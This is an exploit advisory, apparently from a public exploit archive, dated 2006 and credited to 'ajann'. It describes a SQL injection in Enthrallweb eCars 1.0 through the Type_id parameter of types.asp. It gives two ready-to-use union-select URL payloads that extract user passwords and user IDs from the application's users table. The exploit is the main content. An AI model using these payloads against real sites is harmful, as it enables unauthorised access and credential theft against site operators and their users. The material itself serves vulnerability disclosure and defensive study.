id: 1297
date: 12/23/2006
title: Enthrallweb eCars 1.0 (types.asp) Remote SQL Injection Vulnerability
author: ajann
cves: 

====================================================================
Enthrallweb eCars 1.0 (types.asp) Remote SQL Injection Vulnerability
====================================================================



*******************************************************************************
# Title   :  Enthrallweb eCars 1.0 (types.asp) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.enthrallweb.us
# $$      :  179.40  USD

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//Types.asp?Type_id=[SQL]

Example:

Home >> Pass
//Types.asp?Type_id=-1%20union%20select%200,u_Password%20from%20users
Home >> user
//Types.asp?Type_id=-1%20union%20select%200,u_ID%20from%20users


[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!


#  0day.today [2023-03-26]  #